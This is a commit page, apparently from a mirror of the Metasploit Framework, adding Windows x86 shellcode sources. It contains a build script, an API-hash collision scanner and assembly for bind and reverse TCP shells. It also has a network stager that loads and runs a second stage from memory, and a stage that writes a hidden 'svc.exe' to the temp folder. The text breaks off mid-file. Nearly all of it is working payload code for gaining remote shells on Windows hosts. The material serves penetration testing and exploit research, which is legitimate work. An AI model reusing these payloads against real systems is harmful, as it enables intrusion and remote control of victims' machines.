infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Overhaul of the metasploit payloads from Stephen Fewer - smaller/cleaner/new hashing/support for WinNT 4.0 -> Win7 with size reductions for the stagers and minimal size increases for the singles 

git-svn-id: file:///home/svn/framework3/trunk@6922 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2009-07-31 17:50:10 +00:00
parent 91faadd782
commit 49b7dcb30c
33 changed files with 1058 additions and 196 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
external/source/shellcode/windows/x86/bin/single_exec.bin vendored Normal file
View File

Binary file not shown.

BIN
external/source/shellcode/windows/x86/bin/single_shell_bind_tcp.bin vendored Normal file
View File

Binary file not shown.

BIN
external/source/shellcode/windows/x86/bin/single_shell_reverse_tcp.bin vendored Normal file
View File

Binary file not shown.

BIN
external/source/shellcode/windows/x86/bin/stage_shell.bin vendored Normal file
View File

Binary file not shown.

BIN
external/source/shellcode/windows/x86/bin/stage_upexec.bin vendored Normal file
View File

Binary file not shown.

BIN
external/source/shellcode/windows/x86/bin/stager_bind_tcp_nx.bin vendored Normal file
View File

Binary file not shown.

BIN
external/source/shellcode/windows/x86/bin/stager_reverse_tcp_nx.bin vendored Normal file
View File

Binary file not shown.

98
external/source/shellcode/windows/x86/build.py vendored Normal file
View File

@ -0,0 +1,98 @@
#=============================================================================#
# A simple python build script to build the singles/stages/stagers and
# some usefull information such as offsets and a hex dump. The binary output
# will be placed in the bin directory. A hex string and usefull comments will
# be printed to screen.
#
# Example:
# >python build.py stager_reverse_tcp_nx
#
# Example, to build everything:
# >python build.py all > build_output.txt
#
# Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
#=============================================================================#
import os, sys, time
from subprocess import Popen
from struct import pack
#=============================================================================#
def clean( dir="./bin/" ):
for root, dirs, files in os.walk( dir ):
for name in files:
os.remove( os.path.join( root, name ) )
#=============================================================================#
def locate( src_file, dir="./src/" ):
for root, dirs, files in os.walk( dir ):
for name in files:
if src_file == name:
return root
return None
#=============================================================================#
def build( name ):
location = locate( "%s.asm" % name )
if location:
input = os.path.normpath( os.path.join( location, name ) )
output = os.path.normpath( os.path.join( "./bin/", name ) )
p = Popen( ["nasm", "-f bin", "-O3", "-o %s.bin" % output, "%s.asm" % input ] )
p.wait()
xmit( name )
else:
print "[-] Unable to locate '%s.asm' in the src directory" % name
#=============================================================================#
def xmit_dump_ruby( data, length=16 ):
dump = ""
for i in xrange( 0, len( data ), length ):
bytes = data[ i : i+length ]
hex = "\"%s\"" % ( ''.join( [ "\\x%02X" % ord(x) for x in bytes ] ) )
if i+length <= len(data):
hex += " +"
dump += "%s\n" % ( hex )
print dump
#=============================================================================#
def xmit_offset( data, name, value ):
offset = data.find( value );
if offset != -1:
print "# %s Offset: %d" % ( name, offset )
#=============================================================================#
def xmit( name, dump_ruby=True ):
bin = os.path.normpath( os.path.join( "./bin/", "%s.bin" % name ) )
f = open( bin, 'rb')
data = f.read()
print "# Name: %s\n# Length: %d bytes" % ( name, len( data ) )
xmit_offset( data, "Port", pack( ">H", 4444 ) ) # 4444
xmit_offset( data, "Host", pack( ">L", 0x7F000001 ) ) # 127.0.0.1
xmit_offset( data, "ExitFunk", pack( "<L", 0x0A2A1DE0 ) ) # kernel32.dll!ExitThread
xmit_offset( data, "ExitFunk", pack( "<L", 0x56A2B5F0 ) ) # kernel32.dll!ExitProcess
xmit_offset( data, "ExitFunk", pack( "<L", 0xEA320EFE ) ) # kernel32.dll!SetUnhandledExceptionFilter
xmit_offset( data, "ExitFunk", pack( "<L", 0xE035F044 ) ) # kernel32.dll!Sleep
if dump_ruby:
xmit_dump_ruby( data )
#=============================================================================#
def main( argv=None ):
if not argv:
argv = sys.argv
try:
if len( argv ) == 1:
print "Usage: build.py [clean|all|<name>]"
else:
print "# Built on %s\n" % ( time.asctime( time.localtime() ) )
if argv[1] == "clean":
clean()
elif argv[1] == "all":
for root, dirs, files in os.walk( "./src/single/" ):
for name in files:
build( name[:-4] )
for root, dirs, files in os.walk( "./src/stage/" ):
for name in files:
build( name[:-4] )
for root, dirs, files in os.walk( "./src/stager/" ):
for name in files:
build( name[:-4] )
else:
build( argv[1] )
except Exception, e:
print "[-] ", e
#=============================================================================#
if __name__ == "__main__":
main()
#=============================================================================#

97
external/source/shellcode/windows/x86/src/block/block_api.asm vendored Normal file
View File

@ -0,0 +1,97 @@
;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (24 July 2009)
; Size: 137 bytes
;-----------------------------------------------------------------------------;
[BITS 32]
; Input: The hash of the API to call and all its parameters must be pushed onto stack.
; Output: The return value from the API call will be in EAX.
; Clobbers: EAX, ECX and EDX (ala the normal stdcall calling convention)
; Un-Clobbered: EBX, ESI, EDI, ESP and EBP can be expected to remain un-clobbered.
; Note: This function assumes the direction flag has allready been cleared via a CLD instruction.
; Note: This function is unable to call forwarded exports.
api_call:
pushad ; We preserve all the registers for the caller, bar EAX and ECX.
mov ebp, esp ; Create a new stack frame
xor edx, edx ; Zero EDX
mov edx, [fs:edx+48] ; Get a pointer to the PEB
mov edx, [edx+12] ; Get PEB->Ldr
mov edx, [edx+20] ; Get the first module from the InMemoryOrder module list
next_mod: ;
mov esi, [edx+40] ; Get pointer to modules name (unicode string)
movzx ecx, word [edx+38] ; Set ECX to the length we want to check
xor edi, edi ; Clear EDI which will store the hash of the module name
loop_modname: ;
xor eax, eax ; Clear EAX
lodsb ; Read in the next byte of the name
cmp al, 'a' ; Some versions of Windows use lower case module names
jl not_lowercase ;
sub al, 0x20 ; If so normalise to uppercase
not_lowercase: ;
ror edi, 13 ; Rotate right our hash value
add edi, eax ; Add the next byte of the name
loop loop_modname ; Loop untill we have read enough
; We now have the module hash computed
push edx ; Save the current position in the module list for later
push edi ; Save the current module hash for later
; Proceed to itterate the export address table,
mov edx, [edx+16] ; Get this modules base address
mov eax, [edx+60] ; Get PE header
add eax, edx ; Add the modules base address
mov eax, [eax+120] ; Get export tables RVA
test eax, eax ; Test if no export address table is present
jz get_next_mod1 ; If no EAT present, process the next module
add eax, edx ; Add the modules base address
push eax ; Save the current modules EAT
mov ecx, [eax+24] ; Get the number of function names
mov ebx, [eax+32] ; Get the rva of the function names
add ebx, edx ; Add the modules base address
; Computing the module hash + function hash
get_next_func: ;
jecxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module
dec ecx ; Decrement the function name counter
mov esi, [ebx+ecx*4] ; Get rva of next module name
add esi, edx ; Add the modules base address
xor edi, edi ; Clear EDI which will store the hash of the function name
; And compare it to the one we want
loop_funcname: ;
xor eax, eax ; Clear EAX
lodsb ; Read in the next byte of the ASCII function name
ror edi, 13 ; Rotate right our hash value
add edi, eax ; Add the next byte of the name
cmp al, ah ; Compare AL (the next byte from the name) to AH (null)
jne loop_funcname ; If we have not reached the null terminator, continue
add edi, [ebp-8] ; Add the current module hash to the function hash
cmp edi, [ebp+36] ; Compare the hash to the one we are searchnig for
jnz get_next_func ; Go compute the next function hash if we have not found it
; If found, fix up stack, call the function and then value else compute the next one...
pop eax ; Restore the current modules EAT
mov ebx, [eax+36] ; Get the ordinal table rva
add ebx, edx ; Add the modules base address
mov cx, [ebx+2*ecx] ; Get the desired functions ordinal
mov ebx, [eax+28] ; Get the function addresses table rva
add ebx, edx ; Add the modules base address
mov eax, [ebx+4*ecx] ; Get the desired functions RVA
add eax, edx ; Add the modules base address to get the functions actual VA
; We now fix up the stack and perform the call to the desired function...
finish:
mov [esp+36], eax ; Overwrite the old EAX value with the desired api address for the upcoming popad
pop ebx ; Clear off the current modules hash
pop ebx ; Clear off the current position in the module list
popad ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered
pop ecx ; Pop off the origional return address our caller will have pushed
pop edx ; Pop off the hash value our caller will have pushed
push ecx ; Push back the correct return value
jmp eax ; Jump into the required function
; We now automagically return to the correct caller...
get_next_mod: ;
pop eax ; Pop off the current (now the previous) modules EAT
get_next_mod1: ;
pop edi ; Pop off the current (now the previous) modules hash
pop edx ; Restore our position in the module list
mov edx, [edx] ; Get the next module
jmp short next_mod ; Process this module

63
external/source/shellcode/windows/x86/src/block/block_bind_tcp.asm vendored Normal file
View File

@ -0,0 +1,63 @@
;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer@harmonysecurity.com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (24 July 2009)
;-----------------------------------------------------------------------------;
[BITS 32]
; Input: EBP must be the address of 'api_call'.
; Output: EDI will be the newly connected clients socket
; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
bind_tcp:
push 0x00003233 ; Push the bytes 'ws2_32',0,0 onto the stack.
push 0x5F327377 ; ...
push esp ; Push a pointer to the "ws2_32" string on the stack.
push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
call ebp ; LoadLibraryA( "ws2_32" )
mov eax, 0x0190 ; EAX = sizeof( struct WSAData )
sub esp, eax ; alloc some space for the WSAData structure
push esp ; push a pointer to this stuct
push eax ; push the wVersionRequested parameter
push 0x006B8029 ; hash( "ws2_32.dll", "WSAStartup" )
call ebp ; WSAStartup( 0x0190, &WSAData );
push eax ; if we succeed, eax wil be zero, push zero for the flags param.
push eax ; push null for reserved parameter
push eax ; we do not specify a WSAPROTOCOL_INFO structure
push eax ; we do not specify a protocol
inc eax ;
push eax ; push SOCK_STREAM
inc eax ;
push eax ; push AF_INET
push 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" )
call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
mov edi, eax ; save the socket for later
xor ebx, ebx ; Clear EBX
push ebx ; bind to 0.0.0.0
push 0x5C110002 ; family AF_INET and port 4444
mov esi, esp ; save a pointer to sockaddr_in struct
push byte 16 ; length of the sockaddr_in struct (we only set the first 8 bytes as the last 8 are unused)
push esi ; pointer to the sockaddr_in struct
push edi ; socket
push 0x6737DBC2 ; hash( "ws2_32.dll", "bind" )
call ebp ; bind( s, &sockaddr_in, 16 );
push ebx ; backlog
push edi ; socket
push 0xFF38E9B7 ; hash( "ws2_32.dll", "listen" )
call ebp ; listen( s, 0 );
push ebx ; we set length for the sockaddr struct to zero
push ebx ; we dont set the optional sockaddr param
push edi ; listening socket
push 0xE13BEC74 ; hash( "ws2_32.dll", "accept" )
call ebp ; accept( s, 0, 0 );
push edi ; push the listening socket to close
mov edi, eax ; swap the new connected socket over the listening socket
push 0x614D6E75 ; hash( "ws2_32.dll", "closesocket" )
call ebp ; closesocket( s );

52
external/source/shellcode/windows/x86/src/block/block_exitfunk.asm vendored Normal file
View File

@ -0,0 +1,52 @@
;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (24 July 2009)
; Size: 31 bytes
;-----------------------------------------------------------------------------;
; kernel32.dll!SetUnhandledExceptionFilter (0xEA320EFE) - This exit function
; will let the UnhandledExceptionFilter function perform its default handling
; routine.
;
; kernel32.dll!ExitProcess (0x56A2B5F0) - This exit function will force the
; process to terminate.
;
; kernel32.dll!ExitThread (0x0A2A1DE0) - This exit function will force the
; current thread to terminate. On Windows 2008, Vista and 7 this function is
; a forwarded export to ntdll.dll!RtlExitUserThread and as such cannot be
; called by the api_call function.
;
; ntdll.dll!RtlExitUserThread (0x6F721347) - This exit function will force
; the current thread to terminate. This function is not available on Windows
; NT or 2000.
;-----------------------------------------------------------------------------;
; Windows 7 6.1
; Windows Server 2008 R2 6.1 If the EXITFUNK is ExitThread we must call
; Windows Server 2008 6.0 RtlExitUserThread instead.
; Windows Vista 6.0 _______________________________________________
; Windows Server 2003 R2 5.2
; Windows Server 2003 5.2
; Windows XP 5.1
; Windows 2000 5.0
; Windows NT4 4.0
;-----------------------------------------------------------------------------;
[BITS 32]
; Input: EBP must be the address of 'api_call'.
; Output: None.
; Clobbers: EAX, EBX, (ESP will also be modified)
; Note: Execution is not expected to (successfully) continue past this block
exitfunk:
mov ebx, 0x0A2A1DE0 ; The EXITFUNK as specified by user...
push 0x9DBD95A6 ; hash( "kernel32.dll", "GetVersion" )
call ebp ; GetVersion(); (AL will = major version and AH will = minor version)
cmp al, byte 6 ; If we are not running on Windows Vista, 2008 or 7
jl short goodbye ; Then just call the exit function...
cmp bl, 0xE0 ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
jne short goodbye ;
mov ebx, 0x6F721347 ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
goodbye: ; We now perform the actual call to the exit function
push byte 0 ; push the exit function parameter
push ebx ; push the hash of the exit function
call ebp ; call EXITFUNK( 0 );

44
external/source/shellcode/windows/x86/src/block/block_recv.asm vendored Normal file
View File

@ -0,0 +1,44 @@
;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (24 July 2009)
;-----------------------------------------------------------------------------;
[BITS 32]
; Compatible: block_bind_tcp, block_reverse_tcp
; Input: EBP must be the address of 'api_call'. EDI must be the socket. ESI is a pointer on stack.
; Output: None.
; Clobbers: EAX, EBX, ESI, (ESP will also be modified)
recv:
; Receive the size of the incoming second stage...
push byte 0 ; flags
push byte 4 ; length = sizeof( DWORD );
push esi ; the 4 byte buffer on the stack to hold the second stage length
push edi ; the saved socket
push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" )
call ebp ; recv( s, &dwLength, 4, 0 );
; Alloc a RWX buffer for the second stage
mov esi, [esi] ; dereference the pointer to the second stage length
push byte 0x40 ; PAGE_EXECUTE_READWRITE
push 0x1000 ; MEM_COMMIT
push esi ; push the newly recieved second stage length.
push byte 0 ; NULL as we dont care where the allocation is.
push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
; Receive the second stage and execute it...
mov ebx, eax ; ebx = our new memory address for the new stage
push ebx ; push the address of the new stage so we can return into it
read_more: ;
push byte 0 ; flags
push esi ; length
push ebx ; the current address into our second stages RWX buffer
push edi ; the saved socket
push 0x5FC8D902 ; hash( "ws2_32.dll", "recv" )
call ebp ; recv( s, buffer, length, 0 );
add ebx, eax ; buffer += bytes_received
sub esi, eax ; length -= bytes_received
test esi, esi ; test length
jnz read_more ; continue if we have more to read
ret ; return into the second stage

45
external/source/shellcode/windows/x86/src/block/block_reverse_tcp.asm vendored Normal file
View File

@ -0,0 +1,45 @@
;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (24 July 2009)
;-----------------------------------------------------------------------------;
[BITS 32]
; Input: EBP must be the address of 'api_call'.
; Output: EDI will be the socket for the connection to the server
; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
reverse_tcp:
push 0x00003233 ; Push the bytes 'ws2_32',0,0 onto the stack.
push 0x5F327377 ; ...
push esp ; Push a pointer to the "ws2_32" string on the stack.
push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
call ebp ; LoadLibraryA( "ws2_32" )
mov eax, 0x0190 ; EAX = sizeof( struct WSAData )
sub esp, eax ; alloc some space for the WSAData structure
push esp ; push a pointer to this stuct
push eax ; push the wVersionRequested parameter
push 0x006B8029 ; hash( "ws2_32.dll", "WSAStartup" )
call ebp ; WSAStartup( 0x0190, &WSAData );
push eax ; if we succeed, eax wil be zero, push zero for the flags param.
push eax ; push null for reserved parameter
push eax ; we do not specify a WSAPROTOCOL_INFO structure
push eax ; we do not specify a protocol
inc eax ;
push eax ; push SOCK_STREAM
inc eax ;
push eax ; push AF_INET
push 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" )
call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
mov edi, eax ; save the socket for later
push 0x0100007F ; host 127.0.0.1
push 0x5C110002 ; family AF_INET and port 4444
mov esi, esp ; save pointer to sockaddr struct
push byte 16 ; length of the sockaddr struct
push esi ; pointer to the sockaddr struct
push edi ; the socket
push 0x6174A599 ; hash( "ws2_32.dll", "connect" )
call ebp ; connect( s, &sockaddr, 16 );

49
external/source/shellcode/windows/x86/src/block/block_shell.asm vendored Normal file
View File

@ -0,0 +1,49 @@
;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (24 July 2009)
;-----------------------------------------------------------------------------;
[BITS 32]
; Input: EBP must be the address of 'api_call'. EDI must be a socket.
; Output: None.
; Clobbers: EAX, EBX, ECX, ESI, ESP will also be modified
shell:
push 0x00646D63 ; push our command line: 'cmd',0
mov ebx, esp ; save a pointer to the command line
push edi ; our socket becomes the shells hStdError
push edi ; our socket becomes the shells hStdOutput
push edi ; our socket becomes the shells hStdInput
xor esi, esi ; Clear ESI for all the NULL's we need to push
push byte 18 ; We want to place (18 * 4) = 72 null bytes onto the stack
pop ecx ; Set ECX for the loop
push_loop: ;
push esi ; push a null dword
loop push_loop ; keep looping untill we have pushed enough nulls
mov word [esp + 60], 0x0101 ; Set the STARTUPINFO Structure's dwFlags to STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
lea eax, [esp + 16] ; Set EAX as a pointer to our STARTUPINFO Structure
mov byte [eax], 68 ; Set the size of the STARTUPINFO Structure
; perform the call to CreateProcessA
push esp ; Push the pointer to the PROCESS_INFORMATION Structure
push eax ; Push the pointer to the STARTUPINFO Structure
push esi ; The lpCurrentDirectory is NULL so the new process will have the same current directory as its parent
push esi ; The lpEnvironment is NULL so the new process will have the same enviroment as its parent
push esi ; We dont specify any dwCreationFlags
inc esi ; Increment ESI to be one
push esi ; Set bInheritHandles to TRUE in order to inheritable all possible handle from the parent
dec esi ; Decrement ESI back down to zero
push esi ; Set lpThreadAttributes to NULL
push esi ; Set lpProcessAttributes to NULL
push ebx ; Set the lpCommandLine to point to "cmd",0
push esi ; Set lpApplicationName to NULL as we are using the command line param instead
push 0x863FCC79 ; hash( "kernel32.dll", "CreateProcessA" )
call ebp ; CreateProcessA( 0, &"cmd", 0, 0, TRUE, 0, 0, 0, &si, &pi );
; perform the call to WaitForSingleObject
mov eax, esp ; save pointer to the PROCESS_INFORMATION Structure
dec esi ; Decrement ESI down to -1 (INFINITE)
push esi ; push INFINITE inorder to wait forever
inc esi ; Increment ESI back to zero
push dword [eax] ; push the handle from our PROCESS_INFORMATION.hProcess
push 0x601D8708 ; hash( "kernel32.dll", "WaitForSingleObject" )
call ebp ; WaitForSingleObject( pi.hProcess, INFINITE );

146
external/source/shellcode/windows/x86/src/hash.py vendored Normal file
View File

@ -0,0 +1,146 @@
#=============================================================================#
# This script can detect hash collisions between exported API functions in
# multiple modules by either scanning a directory tree or just a single module.
# This script can also just output the correct hash value for any single API
# function for use with the 'api_call' function in 'block_api.asm'.
#
# Example: Detect fatal collisions against all modules in the C drive:
# >hash.py /dir c:\
#
# Example: List the hashes for all exports from kernel32.dll (As found in 'c:\windows\system32\')
# >hash.py /mod c:\windows\system32\ kernel32.dll
#
# Example: Simply print the correct hash value for the function kernel32.dll!WinExec
# >hash.py kernel32.dll WinExec
#
# Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
#=============================================================================#
from sys import path
import os, time, sys
# Modify this path to pefile to suit your machine...
pefile_path = "D:\\Development\\Frameworks\\pefile\\"
path.append( pefile_path )
import pefile
#=============================================================================#
collisions = [ ( 0x006B8029, "ws2_32.dll!WSAStartup" ),
( 0xE0DF0FEA, "ws2_32.dll!WSASocketA" ),
( 0x6737DBC2, "ws2_32.dll!bind" ),
( 0xFF38E9B7, "ws2_32.dll!listen" ),
( 0xE13BEC74, "ws2_32.dll!accept" ),
( 0x614D6E75, "ws2_32.dll!closesocket" ),
( 0x6174A599, "ws2_32.dll!connect" ),
( 0x5FC8D902, "ws2_32.dll!recv" ),
( 0x5F38EBC2, "ws2_32.dll!send" ),
( 0x5BAE572D, "kernel32.dll!WriteFile" ),
( 0x4FDAF6DA, "kernel32.dll!CreateFileA" ),
( 0x13DD2ED7, "kernel32.dll!DeleteFileA" ),
( 0xE449F330, "kernel32.dll!GetTempPathA" ),
( 0x528796C6, "kernel32.dll!CloseHandle" ),
( 0x863FCC79, "kernel32.dll!CreateProcessA" ),
( 0xE553A458, "kernel32.dll!VirtualAlloc" ),
( 0x300F2F0B, "kernel32.dll!VirtualFree" ),
( 0x0726774C, "kernel32.dll!LoadLibraryA" ),
( 0x7802F749, "kernel32.dll!GetProcAddress" ),
( 0x601D8708, "kernel32.dll!WaitForSingleObject" ),
( 0x876F8B31, "kernel32.dll!WinExec" ),
( 0x9DBD95A6, "kernel32.dll!GetVersion" ),
( 0xEA320EFE, "kernel32.dll!SetUnhandledExceptionFilter" ),
( 0x56A2B5F0, "kernel32.dll!ExitProcess" ),
( 0x0A2A1DE0, "kernel32.dll!ExitThread" ),
( 0x6F721347, "ntdll.dll!RtlExitUserThread" ),
( 0x23E38427, "advapi32.dll!RevertToSelf" )
]
collisions_detected = {}
modules_scanned = 0
functions_scanned = 0
#=============================================================================#
def ror( dword, bits ):
return ( dword >> bits | dword << ( 32 - bits ) ) & 0xFFFFFFFF
#=============================================================================#
def unicode( string, uppercase=True ):
result = "";
if uppercase:
string = string.upper()
for c in string:
result += c + "\x00"
return result
#=============================================================================#
def hash( module, function, bits=13, print_hash=True ):
module_hash = 0
function_hash = 0
for c in unicode( module + "\x00" ):
module_hash = ror( module_hash, bits )
module_hash += ord( c )
for c in str( function + "\x00" ):
function_hash = ror( function_hash, bits )
function_hash += ord( c )
h = module_hash + function_hash & 0xFFFFFFFF
if print_hash:
print "[+] 0x%08X = %s!%s" % ( h, module.lower(), function )
return h
#=============================================================================#
def scan( dll_path, dll_name, print_hashes=False, print_collisions=True ):
global modules_scanned
global functions_scanned
try:
dll_name = dll_name.lower()
modules_scanned += 1
pe = pefile.PE( os.path.join( dll_path, dll_name ) )
for export in pe.DIRECTORY_ENTRY_EXPORT.symbols:
if export.name is None:
continue
h = hash( dll_name, export.name, print_hash=print_hashes )
for ( col_hash, col_name ) in collisions:
if col_hash == h and col_name != "%s!%s" % (dll_name, export.name):
if h not in collisions_detected.keys():
collisions_detected[h] = []
collisions_detected[h].append( (dll_path, dll_name, export.name) )
break
functions_scanned += 1
except:
pass
#=============================================================================#
def scan_directory( dir ):
for dot, dirs, files in os.walk( dir ):
for file_name in files:
if file_name[-4:] == ".dll":# or file_name[-4:] == ".exe":
scan( dot, file_name )
print "\n[+] Found %d Collisions.\n" % ( len(collisions_detected) )
for h in collisions_detected.keys():
for (col_hash, col_name ) in collisions:
if h == col_hash:
detected_name = col_name
break
print "[!] Collision detected for 0x%08X (%s):" % ( h, detected_name )
for (collided_dll_path, collided_dll_name, collided_export_name) in collisions_detected[h]:
print "\t%s!%s (%s)" % ( collided_dll_name, collided_export_name, collided_dll_path )
print "\n[+] Scanned %d exported functions via %d modules.\n" % ( functions_scanned, modules_scanned )
#=============================================================================#
def main( argv=None ):
if not argv:
argv = sys.argv
try:
if len( argv ) == 1:
print "Usage: hash.py [/dir <path>] | [/mod <path> <module.dll>] | [<module.dll> <function>]"
else:
print "[+] Ran on %s\n" % ( time.asctime( time.localtime() ) )
if argv[1] == "/dir":
print "[+] Scanning directory '%s' for collisions..." % argv[2]
scan_directory( argv[2] )
elif argv[1] == "/mod":
print "[+] Scanning module '%s' in directory '%s'..." % ( argv[3], argv[2] )
scan( argv[2], argv[3], print_hashes=True )
else:
hash( argv[1], argv[2] )
except Exception, e:
print "[-] ", e
#=============================================================================#
if __name__ == "__main__":
main()
#=============================================================================#

26
external/source/shellcode/windows/x86/src/single/single_exec.asm vendored Normal file
View File

@ -0,0 +1,26 @@
;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (28 July 2009)
; Size: 191 bytes + strlen(command) + 1
; Build: >build.py single_exec
;-----------------------------------------------------------------------------;
[BITS 32]
[ORG 0]
cld ; Clear the direction flag.
call start ; Call start, this pushes the address of 'api_call' onto the stack.
delta: ;
%include "./src/block/block_api.asm" ;
start: ;
pop ebp ; Pop off the address of 'api_call' for calling later.
push byte +1 ;
lea eax, [ebp+command-delta]
push eax ;
push 0x876F8B31 ; hash( "kernel32.dll", "WinExec" )
call ebp ; WinExec( &command, 1 );
; Finish up with the EXITFUNK.
%include "./src/block/block_exitfunk.asm"
command:
;db "calc.exe", 0

20
external/source/shellcode/windows/x86/src/single/single_shell_bind_tcp.asm vendored Normal file
View File

@ -0,0 +1,20 @@
;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (28 July 2009)
; Size: 341 bytes
; Build: >build.py single_shell_bind_tcp
;-----------------------------------------------------------------------------;
[BITS 32]
[ORG 0]
cld ; Clear the direction flag.
call start ; Call start, this pushes the address of 'api_call' onto the stack.
%include "./src/block/block_api.asm"
start: ;
pop ebp ; Pop off the address of 'api_call' for calling later.
%include "./src/block/block_bind_tcp.asm"
; By here we will have performed the bind_tcp connection and EDI will be out socket.
%include "./src/block/block_shell.asm"
; Finish up with the EXITFUNK.
%include "./src/block/block_exitfunk.asm"

20
external/source/shellcode/windows/x86/src/single/single_shell_reverse_tcp.asm vendored Normal file
View File

@ -0,0 +1,20 @@
;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (28 July 2009)
; Size: 314 bytes
; Build: >build.py single_shell_reverse_tcp
;-----------------------------------------------------------------------------;
[BITS 32]
[ORG 0]
cld ; Clear the direction flag.
call start ; Call start, this pushes the address of 'api_call' onto the stack.
%include "./src/block/block_api.asm"
start: ;
pop ebp ; Pop off the address of 'api_call' for calling later.
%include "./src/block/block_reverse_tcp.asm"
; By here we will have performed the reverse_tcp connection and EDI will be out socket.
%include "./src/block/block_shell.asm"
; Finish up with the EXITFUNK.
%include "./src/block/block_exitfunk.asm"

22
external/source/shellcode/windows/x86/src/stage/stage_shell.asm vendored Normal file
View File

@ -0,0 +1,22 @@
;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (28 July 2009)
; Size: 240 bytes
; Build: >build.py stage_shell
;-----------------------------------------------------------------------------;
[BITS 32]
[ORG 0]
; By here EDI will be our socket and EBP will be the address of 'api_call' from stage 1.
; We reset EBP to the address of 'api_call' as found in this blob to avoid any problems
; if the old stage 1 location gets munged.
cld ; Clear the direction flag.
call start ; Call start, this pushes the address of 'api_call' onto the stack.
%include "./src/block/block_api.asm"
start: ;
pop ebp ; Pop off the address of 'api_call' for calling later.
%include "./src/block/block_shell.asm"
; Perform the call to our EXITFUNC.
%include "./src/block/block_exitfunk.asm"

137
external/source/shellcode/windows/x86/src/stage/stage_upexec.asm vendored Normal file
View File

@ -0,0 +1,137 @@
;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (28 July 2009)
; Size: 398 bytes
; Build: >build.py stage_upexec
;-----------------------------------------------------------------------------;
[BITS 32]
[ORG 0]
; By here EDI will be our socket and EBP will be the address of 'api_call' from stage 1.
; We reset EBP to the address of 'api_call' as found in this blob to avoid any problems
; if the old stage 1 location gets munged.
cld ; Clear the direction flag.
call start ; Call start, this pushes the address of 'api_call' onto the stack.
delta: ;
%include "./src/block/block_api.asm"
start: ;
pop ebp ; Pop off the address of 'api_call' for calling later.
; create a file in a temp dir...
push byte 127 ; Push down 127
pop eax ; And pop it into EAX
shl eax, 3 ; Shift EAX left by 3 so it = 1016
sub esp, eax ; Alloc this space on the stack for the temp file path + name
push esp ; Push the buffer address
push eax ; Push the buffer size (127 * 4 = 508)
push 0xE449F330 ; hash( "kernel32.dll", "GetTempPathA" )
call ebp ; GetTempPathA( 1016, &buffer );
lea eax, [esp+eax] ; EAX = pointer to the end of the temp path buffer (ESP point to the full path)
mov dword [eax+0], 0x2E637673 ; Append the file name...
mov dword [eax+4], 0x00657865 ; 'svc.exe',0
; Create the file...
mov eax, esp ; to save a few bytes, pace the file path pointer in EAX
push eax ; save the pointer to the file path for later
push byte 0 ; We dont specify a template file handle
push byte 6 ; The Flags and Attributes: FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM
push byte 2 ; The Creation Disposition: CREATE_ALWAYS
push byte 0 ; We dont specify a SECURITY_ATTRIBUTES structure
push byte 7 ; The Share Mode: FILE_SHARE_DELETE|FILE_SHARE_READ|FILE_SHARE_WRITE
push 0xE0000000 ; The Desired Access: GENERIC_EXECUTE|GENERIC_READ|GENERIC_WRITE
push eax ; The name of the file to create
push 0x4FDAF6DA ; hash( "kernel32.dll", "CreateFileA" )
